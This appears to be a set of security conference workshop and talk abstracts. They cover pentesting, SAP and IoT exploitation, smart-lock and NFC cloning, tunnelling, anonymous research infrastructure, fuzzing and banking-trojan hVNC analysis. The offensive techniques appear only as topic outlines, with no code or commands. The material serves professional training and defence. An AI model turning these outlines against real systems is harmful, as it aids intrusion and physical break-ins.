A 2 days 100% “hands-on” workshop.

Main topics:

•  Buffer overflow 101: Find and exploit buffer overflows yourself and bypass OS protections (because a lot of pentesters don’t even know how it works under the hood);
•  Web exploitation: Manually find and exploit web app vulnerabilities using Burpsuite (Yes, running WebInspect, AppScan, Acunetix or Netsparker is fine but you can do a lot more by hand);
• Network exploitation: Manually exploit network related vulnerabilities using Scapy, ethercap and Responder (Because it works so often when doing internal pentests);
• Passwords: Optimize the way you attack offline and online passwords (0day is fun but the way guys come in most of the time is simply by using login/passwords);
• iOS/Android app hacking: Find and exploit mobile app vulnerabilities using Needle, Frida, Cycript and Hopper (Companies move their apps in the cloud and in the mobile world so pentesters have to evolve … or die) ;

In the security community, most threat researchers are conducting research in an insecure and time-consuming environment. Whether intelligence is gathered from private communications over an IRC server or postings on an underground forum, researchers must be able to identify, document, and disseminate their findings quickly and without compromise. Having a secure and monitored enterprise covert communications framework in place will allow your researchers to focus on producing finished intelligence. In this workshop, we will discuss everything from creating/securing system architecture to developing methods for automation, all while staying protected.
The speakers will begin by detailing virtual server presence and configurations for virtual machines. The systems will be setup properly with tools and services commonly required by researchers. Network communications and anonymization techniques will also be covered in depth. This includes best practices for buying online services with Bitcoin and cash, the caretaking and sharing of online personas, and demonstrations on how actions done on a website, IRC server, forum, or gaming chat room can be tracked back to the researcher. Counter-log activities, the integration of mobile/social platforms, and legal implications/nuances will also be discussed.
The Advanced Programs Group within McAfee has experience in conducting sensitive and timely investigations in an enterprise environment. APG’s lessons learned in creating and maintaining these systems can assist research teams of any size in their endeavor to be more secure and deliver timely intelligence.


Presentation Outline
⦁ Introduction and key terms (VPN, VPS, COVCOM, COLLCO, etc…)
⦁ Basic terminology

⦁ ESXi Architecture and Hypervisor Support
⦁ How to install ESXi and lock it down for specific tasks
⦁ How to create different templates for different types of research
⦁ Disabling services and systems configuration to counter malware infections and stop infections from breaking out of the analyst’s virtual machine
⦁ Which services to enable to allow malware analysis to take place using tools such as Cuckoo Sandbox or Mcafee ATD

⦁ Creating Virtual Private Servers
⦁ How to purchase virtual private servers anonymously
⦁ Creating network communication between virtual private servers and virtual private networks for effective communication
⦁ Registering with a Regional Internet Registry and as well as Acquiring a /24 and /48 network
⦁ Getting connectivity between your Virtual Private Servers and the covert network
⦁ How to choose a secure address and BGP sessions based on pricing and anonymity

⦁ Social Media
⦁ Creating online personas for long term investigations, and how to document the usage of the persona so that any analyst can be assigned a persona
⦁ Behavior differences between online personas online, in things such as forums and IRC servers
⦁ How to track social media accounts being used by the analyst with alerts to keep a persona alive

⦁ Developing collections
⦁ How to run automated scrapes to gather intelligence for later investigations
⦁ How to log behavior within an IRC server covertly
⦁ Develop methods and working pipelines to gather information from closed sources regularly without being identified as a scheduled process

⦁ Ways how researchers get caught.
⦁ How researchers have been d0xed, case examples and how they could have been prevented
⦁ 10 commandments of things a researcher should always follow while ‘acting’ out an online persona
⦁ Using bitcoin to create and setup accounts/systems/network/etc

⦁ How to stay legal
⦁ General thoughts and ideas that might arise, situations such as being forced to attack a server to being sent unsolicited pictures
Attendee Takeaways
⦁ How to develop a secure environment that can be used to conduct online investigations and stay secure. How tools leave traces and how they interact with online instances.
⦁ How to conduct malware analysis within an enterprise network with systems put into place to help with automated malware analysis.
⦁ How to keep network communications secure and anonymous.
⦁ Understanding requirements for threat intelligence research and knowing how actions can be countered by forms of counter intelligence.

Traditional security defense tools are increasingly unable to protect against emerging and current attacks. The modern attacker has adopted advanced tools and techniques that are unable to be stopped with traditional firewalls, intrusion detection and anti-virus. Meanwhile, dedicated attackers are attempting intrusions over months and years while going undetected to steal valuable information, trade secrets and financial information. Defense techniques that leverage information about attackers and their techniques, however, provide the ability to greatly enhance the security of an organization.

Modern defenses can integrate intelligence and counterintelligence information which greatly increases the ability to keep attackers out and to detect their presence quickly. This course will teach students about the tools they can use to gain insight into attackers and to integrate them into their organization. This course will be a mix of lecture and hands-on training so students will be equipped on day one to go back to their work and start using threat intelligence to protect their networks.

TOPICS COVERED:

- Critical Thinking, ACH and Threat Intelligence Models
- Intelligence Sharing Mechanisms
- Open Source Intelligence Gathering, Tools and Sources
- The Collective Intelligence Framework
- Malware Information Sharing Platform
- Yara Primer for Threat Intelligence
- Malware Surveillance Techniques
- Creating and Deriving Intelligence Data
- Identifying Adversarial Weaknesses and Disruption Operations
- Defensive and Offensive Deception Techniques

WHO SHOULD ATTEND

Investigators, network defenders, incident responders and anyone interested in how to use intelligence to get ahead of the adversary.

WHAT STUDENTS SHOULD BRING

A laptop capable of running VMs (specific OSes and configs will be sent to students prior to class)

WHAT STUDENTS NEED TO KNOW

Basic scripting (bash or python), understanding of reverse engineering malware and sandboxing, knowledge of networking and DNS.

Open Source Defensive Security Training is an Open Source IT Security laboratory dedicated to professionals who want to close the gaps in Linux & Open Source Security knowledge. Very detailed and up to date course content with focus especially on defensive approach gives you the best opportunity to create stronger defensive layers inside your network infrastructures or/and Linux-based products. Delivering real world scenarios in our Open Source Defensive Security hands-on lab provides you with a very practical knowledge you need to expand your Linux Security skills.

This is an extremely deep dive training on Open Source-based infrastructure security, Linux systems and network services hardening. We like details as attackers do and these details make all the difference - in the offensive and defensive approach. Our high-tech workshop has a unique formula when it comes to “protection vs attack”. This means that most of the security issues we are talking about will be effectively protected by the use of a suitable approach, sophisticated software and dedicated secure configuration.

We focus on delivering a defensive content, but we understand that for being good in defense you have to also be good in offense. We are providing a kind of knowledge-mix in these fields using Open Source software. Except for basic Linux skills and TCP/IP knowledge, most of the lab exercises require at least a basic understanding of how attacker techniques work and so we'll introduce you to it. We strongly believe that only a mix of broad, systematic Defensive and Offensive Security knowledge can guarantee secure solutions.


1) Threats are everywhere - Introduction to the technical Open Source Defensive Security program.

2) Web application security -> hardened Reverse Proxy -> modsecurity vs HTTP security issues:

Analysis and practical use of exploits for popular web applications: Jenkins, Zimbra, PHPnuke, Joomla, Drupal, PHPmyadmin, OScommerce, Magento, Wordpress, dotProject and others
Authorization and authentication: CAS SSO, OAuth, SAML (ipsilon), Federation, Basic / Digest Auth, SSL authentication, LDAP authorization, SAML based -mod_auth_mellon, Kerberos based - mod_auth_kerb, Login-form based -mod_intercept_form_submit, Mod_lookup_identity, mod_pubcookie
HTTPS – how to achieve status A+?:
Attacks:
Heartbleed
Breach
Drown
Beast
Poodle
MiTM: sslstrip
Mutual SSL
Security headers: Content Security Policy, Cross Origin Resource Sharing / Same Origin Policy, X-Frame-Options, X-Content-Type-Options, X-XSS-Protection, Fetch API, Service Workers, Sub_resource Integrity, Per-page sub-origins, Content Security Policy (CSP), HTTP Strict Transport Security (HSTS), Same Origin Policy (SOP) / Cross Origin Resource Sharing (CORS), HPKP, PFS
Cookies:Secure, Httponly, Domain, Path, Same_site, Clear Site Data Feature Policy, First-party cookies
HTTP header anomalies
Virtual patching
Full HTTP auditing
LUA/OpenResty support
Sensor approach - OWASP Appsensor
Web application security using Modsecurity - creating dedicated WAF rules against:
Injections
Null bytes
Path/directory traversal
LFI/RFI->Command Execution
Cross Site Scripting (XSS)
Cross Site Request Forgery (CSRF)
HTTP Parameter Pollution (HPP)
Open Redirect
Insecure Direct Object Reference vs HMAC
Forceful Browsing
CSWSH - Cross Site Websocket Hijacking
Session Security
Brute force
Slow DOS
GEO restrictions
Error handling
Leakage detection
Secure file upload
Secure logout / forgot password form
Web honeypots
Bot/scan protection
AV protection
PHP Security
Tomcat Security
Tools:
Sqlmap, sqlninja
Xsser
Dominator
Skipfish
ZAP / Burp
Wafdetect
Joomla, wpscan
Dirbuster, dirb
Nikto
JSDetox
Brakeman
3) Hardened Linux vs exploits/rootkits:

Discretionary Access Control (DAC) vs Mandatory Access Control (MAC)
Grsecurity / PAX
SELinux / Multi Category Security / sVirt
Apparmor, Tomoyo, Smack, RSBAC
GCC hardening: SSP, NX, PIE, RELRO, ASLR vs buffer overflow
Linux Containers - Docker/LXC
LKM-off / YAMA / enforcing
Linux capabilities vs SUID and others
System call restriction - seccomp
Integrity checking - IMA/EVM
Package mgmt security
Debuggers and profilers - gdb/strace/ldd/Valgring/Yara
Chroot/jail/pivot_root
Behavioural analysis - systemtap / LTTng / sysdig
Memory forensics - Volatility vs malware
PAM / 2FA
System update vs reboot
*privchecks
4) Network security:

Vulnerability scanning:
Nmap NSE
Seccubus
OpenVAS
Metasploit
Linux Domain Controller - IdM/HBAC/SUDO
SFTP/SCP - Secure SSH Relay
Restricted shells/commands
SSH tips and tricks
Public Key Infrastructure – SSL/TLS
NFS Security
Database Security
DNS Security
Mail Security
DOS / scanning / brute-force protection techniques
Advanced network firewall: iptables/nftables/ebtables
System honeypots
Network traffic analysis - wireshark, scapy / tcpdump / tcpreplay
Suricata / Bro IDS / Snort / SELKS vs known malware and attacks:
metasploit,
PtH,
Heartbleed,
shellshock and others
Security by obscurity
5) System Auditing, integrating & accounting:

*syslog
auditd
OSSEC / Samhain / aide
SIEM: Splunk/ELK/OSSIM/osquery
6) Summary: offense vs defense. Additional labs:

GDB introduction LAB
Seccomp -> additional LABs
Apparmor policy development
Volatility LAB - diffing between infected and clean memory dumps
Malware PCAP analysis / tcpreplay / suricata+ELK(SELK) / cuckoo / limon sandbox
SELinux module development
PAX - policy development
PAM LAB: google-authenticator / yubikey
Simple kernel module development + hidding + detection
Suricata vs metasploit, PtH, heartbleed, shellshock and others
WLAN Security vs Evil Twin / Karma and others attack detection

SAP is no longer an unknown black box for the security community and SAP products appear more and more often in audit requests. This training is focused on SAP Netweaver. Because we can't cover seriously all SAP software in two days, we decided to work on the most frequent vulnerabilities we faced during our pentests. We'll provide different SAP Systems with different configuration issues in 'realistic' environment, and also a pre-configured attacker VM with all tools required to perform training activities. Few slides, lots of practice, that's the leitmotiv of this course. SAP knowledge is not required.

Prerequisites:
General knowledge on pentesting. SAP knowledges is NOT required.

Target audience:
Pentesters or security professional. Anyone interested to learn about SAP Security

Requirements / Material to bring by attendees:
A laptop capable of running virtual machine, with 10G free disk space and 1GB Ram for VM.

Similar works:
This course is an improved version of the training done during the Hack In Paris 2017 Conference. I've created two  'easy' SAP challenges for the free security platform ‘root-me’: https://www.root-me.org/en/Challenges/Realist/SAP-Pentest-007
https://www.root-me.org/en/Challenges/Realist/SAP-Pentest-000
These challenges are not the same than the ones in this course.

Agenda:
Detailed presentation material will be provided to attendees at the start of course.
Please find the course outline below: 

Day 1

Introduction
Introduction to the world of SAP
SAP?
SAP in numbers
SAP Netweaver ABAP?
Global technical concept
Technical component
SAP as user

Introduction to SAP Security
Latest changes in SAP Security
The SAP security parts
SAP Security Notes
Attack surface
Risks

Training infrastructure
Overview and warning
Kali-SAP    
Hands-on : Tools, installation, setup
SAP cheatsheets for pentesters

SAProuter
What is SAProuter?
How SAProuters work
SAProuter vulnerabilities
   Hands-on : Discover internal SAP, discover SAP port, forward port Remediation

SAP Gui
Overview & How to
   Hands-on : Moving around SAP Gui
SAP Gui information gathering
SAP Gui shortcut vulnerability
    Hands-on : Retreive information, crack user password
Lastest vulnerabilities found
Remediation

SAP Netweaver ABAP
Overview
SAP authorization
Password and default accounts
    Hands-on : Find default account and password of target 
SAP Message Server
    Hands-on : Playing with Message Server
SAP ICM
    Hands-on : Playing with ICM
SAP MMC
    Hands-on : Playing with MMC
SAP RFC Gateway
    Hands-on : RCE through SAP Gateway
Remediation

Day 2

SAP Secure Store
Overview
ABAP Secure Storage
   Hands-on : Decrypt ABAP Secure Storage
Secure Storage in File System
   Hands-on : Decrypt SSFS
Remediation

Database level security
Overview
Focusing on Oracle
Oracle OPS$ attack
    Hands-on : Retrieve SAP database schema password
Remediation

SAP Horizontal movement
Concept in SAP
RFC hardcoded credential
    Hands-on : Get access to trusted SAP system with diaglog user
    Hands-on : Get access to trusted SAP system with no-diaglog user
Pivot with SAP RFC Gateway
   RCE to trusted RFC SAP system
Remediation

SAP Vertical movement
Concept in SAP
    Hands-on : SAP to OS
    Hands-on : OS to database
    Hands-on : SAP to database
    Hands-on : Database to SAP
Remediation

ABAP Code vulnerability (Overview)
Introduction
ABAP Minimum basis
ABAP injection
   Hands-on : Exploit abap injection
OS Command injection
   Hands-on : Exploit OS injection
Native SQL Injection
   Hands-on : Exploit SQLiAuthorization bypass
   Hands-on : Bypass authorization example
Directory traversal
   Hands-on : Exploit directory traversalCross client access
   Hands-on : Cross client access example
Understand SAP OSS Security Patch
   Hands-on : From SAP Security Patch to bind shell
Remediation

CTF
5 Categories for 20+ tasks
    Hands-on : CTF time !
Correction

References
Conclusion & Questions

There is no doubt electronic locks are among the most profitable smart devices to attack. And yet recent disclosures of multiple vulnerabilities clearly show there are not enough specialists able to help with software-related issues of so-far mostly hardware vendors.
This course is intended to fill this skills gap. Based on hands-on exercises with real devices (a dozen various smart locks), attendees will learn how to analyze their security and design them properly. The knowledge will then be applied to many other IoT devices.
During this course students will perform: wireless sniffing, spoofing, cloning, replay, DoS and authentication and command-injection attacks. Practical exercises will include investigating proprietary network protocols, demystifying and breaking “military grade encryption”, abusing excessive services, triggering fallback open, brute-forcing PINs via voice calls and attacking building automation systems.
The software activities will be mixed with short entertaining tricks, including opening a lock by a strong magnet, counterfeiting fingerprints in a biometric sensor or opening a voice-controlled lock by remotely hacking speaker-enabled devices.
Several tasks will evolve around an electromagnetic lock guarding a special vault. Whenever a student will succeed in hacking the lock, the box opens automatically, and one can have a hidden reward.

Technologies covered will include Bluetooth Smart, Linux embedded, KNX, NFC, Wiegand, WiFi, P2P, GSM etc.

Each attendee will receive hardware with a value of about 100 EUR  (detailed below).


List of topics:

Bluetooth Smart - based on at least 7 various smart locks, and tools developed by the trainer: GATTacker BLE MITM proxy and deliberately vulnerable Hackmelock (consisting of Android mobile application and lock device simulated on Raspberry Pi):
- passive sniffing
- static authentication password
- spoofing
- replay attacks
- command injection
- Denial of Service
- cracking "Latest PKI technology"
- other flaws of custom challenge-response authentication
- abusing excessive services (e.g. module's default AT-command interface).
- weaknesses of key sharing with guests functionality
- takeaway Hackmelock challenges for practicing later at home using provided hardware

NFC - based on hotel electronic door lock, access control reader, ski lift pass and a bus ticket
clone UID using "chinese magic" card and provided hardware
- cracking MIFARE Classic keys
- cloning card content
- decoding access control data stored on card by a hotel system
- how to emulate contactless cards and open UID-based lock using just a smartphone

Linux embedded - based on wireless door lock, alarm+home automation system and other devices:
- authentication bypass
- information disclosure
- telnet brute-force
- OS command injection

Proprietary network protocols - based on fingerprint sensor device, wireless door lock, alarm system, HVAC controller
- various approaches to analyzing proprietary protocols
- step-by-step understanding packets and attacking - remote management binary communication of fingerprint sensor
- sniffing and decoding administrative credentials
- abusing improper session management (authentication bypass)
- unlock wireless alarm with a single packet
- P2P communication - how to attack devices hidden behind NAT

KNX home automation - an example installation connected to electromagnetic lock
- theory introduction, typical architecture, group address, device address...
- tools: ETS configuration suite vs open-source - knxd, knxmap, nmap scripts
how to locate and connect to KNX-IP gateway in LAN or remotely
- monitor mode - sniffing the bus communication
- write command to group address and open lock

SMS and DTMF remote control over GSM - based on remote control alarm system
- theory introduction to GSM interception
- brute-force alarm administrative PIN via automated remote SMS and voice calls from the cloud API

Wiegand - wired access control transmission standard
- sniff the data transmitted from access control reader using Raspberry Pi GPIO
- decode card UID from sniffed data, clone the card
- replay card data on the wire to open lock

Moreover, each student will also be able try for himself to:
- open a smart lock using special strokes of a strong magnet which turns the motor inside     the device
- cheat on a fingerprint biometric sensor - we can make your own fingerprint clone during training
- open a voice-controlled lock by hacking a nearby speaker-enabled device


What students should bring?
- contemporary laptop capable of running Kali Linux in virtual machine
- Android > 4.3 smartphone. If you don't have one, please inform in advance - a few will be available for students.
- basic familiarity with Linux command-line, Kali, Wireshark
- scripting skills or pentesting experience will be an advantage, but is not crucial

What will be provided?
- course materials in PDFs (several hundred pages)
- all required additional files: source code, documentation, installation binaries
- Bluetooth Smart hardware sniffer and development kit based on nrf51822 module
- 2 Bluetooth Low Energy USB dongles
- Raspberry Pi 3 with assessment tools and Hackmelock for further hacking at home.
- NFC NXP PN532 board + "magic UID" card - which will allow you to clone most common Mifare Classic contactless cards

Provided hardware picture:
http://smartlockpicking.com/img/events/hardware.jpg

For the first time Dominique Brack, the author of the Social Engineering Engagement Framework (SEEF), offers an in-person public workshop. Normally his  workshops and briefings are closed-group private enterprises or Government only workshops. Attendees will profit from the first-hand knowledge and experience of a social engineering and information security professional with 20 years of experience.

What you will learn: Tools and techniques to plan, execute and manage social engineering engagements. What can and will be used against you, your employees and your organization? This training will provide the skills to detect, defend and assess social engineering attacks and its associated risks. You will learn about the motivations and methods used by social engineers - knowledge which will enable you to better protect yourself and your organization.

Mobiles Apps are the most preferred way of delivering the attacks today. Understanding the finer details of Mobile App attacks is soon becoming an essential skill for penetration testers as well as for the app developers & testers.

So, if you are an Android or an iOS User, a developer, a security analyst, a mobile pen-tester or just a mobile security enthusiast then the 'Mobile App Attack' is of definite interest to you, as the Mobile App Attack familiarizes attendees with in-depth technical explanation of some of the most notorious mobile (Android and iOS) based vulnerabilities, ways to verify and exploit them. Along with the various Android, iOS application analysis techniques, inbuilt security schemes and teaches how to bypass those security models on both the platforms.

With live demos using intentionally crafted real-world vulnerable Android and iOS apps by the author, we shall look into the some of the common ways as to how the malicious apps bypass the security mechanisms or misuse the given permissions.
Apart from that we shall have a brief understanding of what is so special with the latest Android 7 and iOS 10 security and the relating flaws.

NOTE: This is a Three-Day Workshop, starting on the 13th of November, one day earlier than the other trainings.

SHORT ABSTRACT:
-------------------

ARM has emerged as the leading architecture in the Internet of Things (IoT) world. The all new ARM IoT Exploit Laboratory is a fast paced 3-day intermediate level class intended for students who want to take their exploit writing skills to the ARM platform. The class covers everything from an introduction to ARM assembly all the way to Return Oriented Programming (ROP) on ARM architectures. Our lab environment features hardware and virtual platforms for exploring exploit writing on ARM based Linux systems and IoT devices.

The class concludes with an end-to-end "Firmware-To-Shell" hack, where we extract the firmware from a popular SoHo router, build a virtual environment to emulate and debug it, and then use the exploit to gain a shell on the actual hardware device.

LEARNING OBJECTIVES:
-------------------
* Introduction to the ARM CPU architecture
* Exploring ARM assembly language
* Understanding how functions work on ARM
* Debugging on ARM systems
* Exploiting Stack Overflows on ARM
* Writing ARM Shellcode from the ground up
* Introduction to Exploit Mitigation Techniques (XN/DEP and ASLR)
* Introduction to Return Oriented Programming
* Bypassing exploit mitigation on ARM using ROP
* Practical ROP chains on ARM
* An introduction to firmware extraction
* Emulating and debugging an IoT device firmware in a virtual environment
* Case Study: From Firmware to Shell - exploiting an ARM router's embedded firmware

TARGET AUDIENCE:
----------------
- Pentesters working on ARM embedded environments. (SoCs, IoT, etc)
- Red Team members, who want to pen-test custom binaries and exploit custom built applications.
- Bug Hunters, who want to write exploits for all the crashes they find.
- Members of military or government cyberwarfare units.
- Members of reverse engineering research teams.
- People frustrated at IoT devices to the point they want to break them!

Bruce Schneier popularised the concept in 1999: cyber security is about people, process and technology. Yet almost two decades later, the industry still focuses so much more on technology than the other two dimensions of our discipline. For a long time, when the cyber security community has considered the human nature of cyber security, it has been within the context of a narrative that ‘humans are the weakest link’. In this talk, Dr Jessica Barker will argue that, if that is the case, then that is our failing as an industry. With reference to sociology, psychology and behavioural economics, Jessica will discuss why social science needs to be a greater priority for the cyber security community.

"Connect all the things!" - for some time now, this is the main theme when talking about IoT devices, solutions and products. Our eagerness to find new, and at times innovative, ways to make anything suitable to the anthem of the internet is a great promise for malicious activity.

As these devices are supposed to be lightweight they mostly rely on a small fingerprint stack of protocols - one of those protocols is the message protocol - MQTT.

We will go deep into protocol details, observe how common it is to find such devices (and how), and several novel ways to abuse any one of tens of thousands easily spotted publicly facing MQTT brokers on the internet for "fun and profit".

In this paper, we look at N26, a pan-European banking startup and the poster child for young FinTechs, to see how security is treated by startups that provide disruptive technologies in the financial sector. We find out that, in an area that has been committed to security, FinTechs focus on modern designs and outstanding user experience as their main priority. Even though this strategy is rewarded by a rapidly increasing number of customers, it reveals a flawed understanding of security. We analyzed all aspects of security, including the frontend, backend, protocols, human factors and underlying design concepts, and found issues in all of them. We succeeded to leak customer data, to manipulate transactions, and even to entirely take over foreign accounts, ultimately issuing arbitrary transactions. We reported those findings to N26 and did not disclose them before they have been fixed. Hopefully, by publishing this case study now, we raise awareness for security considerations in the critical banking sector also for other FinTech startups.

Badly secured embedded devices enabled the largest DDoS attack on critical networks seen to date: The Mirai attacks in 2016 were largely pegged on Internet-exposed telnet with default credentials. While such telnet accounts are hopefully on their way out, we had a look at the next available hacking options to compromise masses of IoT devices.
It turns out that IP cameras can still be compromised remotely in many other ways - even if they are not exposed directly to the internet. In particular, we found issues in communication protocols, control servers and infrastructure design.
This talk details how we found such next-gen Mirai vulnerabilities, and will demonstrate a number of them. After seeing what we saw, you will have little doubt that there will always be a bot army of compromised embedded devices.

Automated dynamic malware analysis systems are important in combating the proliferation of modern malware. Unfortunately, malware can often easily detect and evade these systems. Competition between malware authors and analysis system developers has pushed each to continually evolve their tactics for countering the other.

In this paper we systematically review i) "fingerprint" -based evasion techniques against automated dynamic malware analysis systems for PC, mobile, and web, ii} evasion detection, iii} evasion mitigation, and iv} evasion "in the wild." We also discuss difficulties in experimentation evaluation, highlight future directions in offensive and defensive research, and briefly survey related topics in anti-analysis.

This presentation will sum up how to do tunnelling with different protocols and will feature different perspectives in detail. For example, companies are fighting hard to block exfiltration from their network: They use http(s) proxies, DLP, IPS technologies to protect their data, but are they protected against tunnelling? There are so many interesting questions to answer for users, abusers, companies and malware researchers. During this presentation we'll show you some mitigation and bypass techniques, which can be used to filter any tunnelling on your network or to bypass misconfigured filters.

Our new tool XFLTReaT is an open-source tunnelling framework that handles all the boring stuff and gives users the capability to take care of only the things that matter. It provides significant improvements over existing tools. From now on there is no need to write a new tunnel for each and every protocol or to deal with interfaces and routing. Any protocol can be converted to a module, which works in a plug-and-play fashion; authentication and encryption can be configured and customised on all traffic, and it is also worth mentioning that the framework was designed to be easy to configure, use and develop.

In case there is a need to send packets over ICMP type 0 or HTTPS TLS v1.2 with a special header, then this can be done in a matter of minutes, instead of developing a new tool from scratch. The potential use (or abuse) cases are plentiful, such as bypassing network restrictions of an ISP, the proxy of a workplace or obtaining Internet connectivity through bypassing captive portals in the middle of the Atlantic Ocean or at an altitude of 33000ft on an airplane.

This framework is not just a tool; it unites different technologies in the field of tunnelling. While we needed to use different tunnels and VPNs for different protocols in the past, like OpenVPN for TCP and UDP, ptunnel for ICMP or iodined for DNS tunnelling, this changes now:

After taking a look at these tools it was easy to see some commonality. All of them are doing the same things only the means of communication are different. We simplified the whole process and created a framework that is responsible for everything but the communication itself, we rethought the old way of tunnelling and tried to give something new to the community. After the initial setup the framework takes care of everything. With the check functionality we can even find out, which module can be used on the network, so there is no need for any low-level packet fu and hassle.

I guarantee that you won’t be disappointed with the tool and the talk, actually you will be an open-source tool richer.

This talk will aim to cover the research which has been undertaken following on from the Defcon presentation on MWR's platform agnostic kernel fuzzing, to automatically identify critical flaws within Apple macOS.

It was observed that there have been limited attempts to create automated kernel fuzzing solutions for macOS, hence the drive to modify our existing frameworks to support the platform and develop support utility tooling to aid vulnerability research.

This talk will focus on how the researchers approached developing fuzzing automation to test the core subsystems of the XNU kernel and the insights gained. The talk will also highlight architectural differences between other supported platforms which needed to be addressed whilst performing integration into the framework.

The old adage of 'different fuzzers find different bugs' will also be explored, as we look into the effectiveness of using targeted fuzzing for specific components considered most likely to yield vulnerabilities.

An in-memory fuzzer based on a combination of static and dynamic analysis was also constructed to target these components with the aim to achieve greater code coverage, efficiency and to allow attacks on other privileged components within macOS via IPC.

Finally we will discuss the issues discovered by the fuzzers and highlight future improvements which could be made to the tooling going forward to increase coverage and effectiveness.

It is also the aim to release the code developed, to make it easier for other researchers who may wish to develop similar fuzzers and provide additional tooling to the macOS research community to aid in vulnerability hunting. Specifically, we will release python tooling for capture, replay and mutation of macOS IPC based communication, corpus generation and monitoring, together with the existing kernel fuzzer platform integration targeting core kernel subsystems.

Memory corruptions are still the most prominent venue to attack
otherwise secure programs. In order to make exploitation of soft-
ware bugs more difficult, defenders introduced a vast number of
post corruption security mitigations, such as w⊕x memory, Stack
Canaries, and Address Space Layout Randomization (ASLR), to only
name a few. In the following, we describe theWiedergänger 1 -Attack,
a new attack vector that reliably allows to escalate unbounded array
access vulnerabilities occurring in specifically allocated memory
regions to full code execution on programs running on i386 / x86_64
Linux.
Wiedergänger-attacks abuse determinism in Linux ASLR imple-
mentation combined with the fact that (even with protection mecha-
nisms such as relro and glibc’s pointer mangling enabled) there exist
easy-to-hijack, writable (function) pointers in application memory.
To discover such pointers, we use taint analysis and backwards
slicing at the binary level and calculate an over-approximation of
vulnerable instruction sequences.
To show the relevance of Wiedergänger, we exploit one of the
discovered instruction sequences to perform an attack on Debian 10
(Buster) by overwriting structures used by the dynamic loader (dl)
that are present in any application depending on glibc and the
dynamic loader. In order to show generality, we solely focus on
data structures dispatched at program shutdown, as this is a point
that arguably all applications eventually have to reach. This results
in a reliable compromise that effectively bypasses all protection
mechanisms deployed on x86_64 / i386 Linux to date.
We believe Wiedergänger to be part of an under-researched
type of control flow hijacking attacks targeting internal control
structures of the dynamic loader for which we propose to use the
terminology Loader Oriented Programming (LOP).

We introduce a design methodology to develop reliable and secure systems based on their functional and non-functional behaviour. The methodology has 3 independent, but complementary, components that employ novel approaches and techniques in the design of reliable and secure systems.

First, we introduce reliable-and-secure-by-design development of secure applications through stepwise sound refinement of an executable specification, employing deductive synthesis to enforce functional and non-functional (e.g. security and safety) properties of the applications.

Second, we present a run-time security monitor at the middleware level that protects system operation in the field through comparison of the application execution and the application specification execution in real-time; the run-time security monitor can be synthesized from the executable specification.

Finally, based on the specification, we perform a vulnerability analysis for false data injection attacks, which leads to application designs that are resilient to this type of attacks. We demonstrate the methodology through its application to a basic and typical industrial control system example application, describing all the tools used and ARMET, the middleware monitor that constitutes the core component of the methodology.

As we know the Android Application Industry from a security perspective, it is also quite well known that the Android platform is succeptible to malicious applications. And with the recent trend where all the vendors and customers going completely mobile, Android has now become an attack surface for most of the malicious attacks. Moreover, the mechanisms used for Android malware detection comprise of several known methods, and we also know that most of these mechanisms are permission based or based on API usage.

But, when we digged deeper and analysed, we also realised that these mechanisms are open to instruction level obfuscation techniques. Hence, we decided to bring in the approach of Machine Learning to the Android Malware analysis such as using graph kernels. We tried implementing two different Graph Kernels namely: The Weisfeiler – Lehman Graph Kernel and the Neighbourhood Hash Graph Kernel method, which can be used to implement a mechanism that can be used to find the similarities among the binaries while being stringent against the used obfuscation.

This Project implementation is based on a well known machine learning algorithm, Support Vector Machine, for solving the problem of Android malware analysis. This method involves the mechanism of detection of Android malware by effeciently embedding the functional call graphs along the feature map. The gamechanger in this concept would be the optimal utilization of the SVM Algorithm(Support Vector Machine) that proves to be better than other approaches, with a minimalistic amount of false positives found and a higher detection rate.

With the help of clean & real malware Android application samples, an explicit classification model was developed. The functional call graphs were extracted out of the Android applications and then the linear-time graph kernel based explicit mapping was deployed in order to efficiently map all the call graphs to the explicit feature space. After the above methods were implemented, the SVM algorithm was trained to thoroughly differentiate between the real and the malicious applications.

Spear phishing is commonly characterized as a social engineering attack vector. The issue with these sort of attacks, is that certain organizations tend to tag these attacks as "un-mitigatable", stating that as long as we have employees, we will always be vulnerable, and then minimize the amount of investment they put into this. But today's realty is very different when it comes to the range of controls, processes and roles an organization can set in place to control this form of attack.

In our talk, we'll give an overview of the attack itself, first taking the point of view of an attacker. We share what platforms he/she would use to collect the intelligence needed for a successful attack and the infrastructure needed to support such an attack campaign. In addition we will discuss what sort of false pretense sophisticated attacker take on, and what sets them apart from the not-so-successful attackers.

In the other half of the talk, we will switch to the point of view of the defender. We will discuss the range of controls the market currently offers to detect, monitor, prevent and complicate such an attack vector, and what level of investment these controls normally take from an organization. We will discuss the weight that every control holds within the larger architecture, and since we conduct red team assessments that include social engineering, we will share from our personal attacker experience what works, and what doesn't. We will conclude by talking about the future state of spear phishing and what the controls of the next generation might look like.

Since the past decade, financial institutions are increasingly faced with the problem of malware stealing hefty amounts of money by performing fraudulent fund transfers from their customers’ online banking accounts.

Many vendors attempt to solve this issue by developing sophisticated products for classifying or risk scoring each transaction. Often, identifying legitimate account holders is based on detecting whether the transaction is made from the legitimate user’s machine or from an untrusted endpoint.

Going back 10 years, and still today, some checks are based on the IP/Geolocation of the machine performing the transaction and comparing it with the user’s typical whereabouts. In order to overcome this identifier, malware authors easily turned the user’s machine into a proxy, making the transaction appear to originate from the same IP address.

Device identification became increasingly sophisticated over the years, adding many parameters of the user’s environment to fingerprint trusted devices. But cybercrime is an arms race, and malware developers did not stay behind. To completely disregard device fingerprinting, they have devised their own circumvention technique: hidden VNC (Virtual Network Computing) that enables them to commit the fraudulent transaction from the user’s own machine without ever being noticed.

In this lecture, we will talk about hVNC in general, but also present and demo the specific use case of Gozi’s proprietary hVNC tool which we reversed and broke in our labs. Gozi is one of the most advanced financial crime tools. It is operated by a cybergang and sees constant innovation and upgrades.

In this talk, we will elaborate on the following subjects:

a. What is VNC and its inherently legal uses
b. What is hVNC and why is it used in crime
c. Which financial malwares use hVNC
d. Show some of the hVNC dirty tricks and explain them.
e. Explain the reversing of Gozi ISFB’s hVNC module (architecture & structure)
f. Live Demo [1/2] - execute the hVNC module and present a live session
g. Live Demo [2/2] - Seeing the actual fraudster session (the hidden part) - script and demo.
h. Provide audience with detection/Mitigation advice.

This session is best suited for stakeholders who work in the anti-fraud departments of their organizations, malware researchers, analysts, and cybercrime investigators. The session requires basic understanding of what banking Trojans are, but does not require specific technical knowledge beyond an information security background.

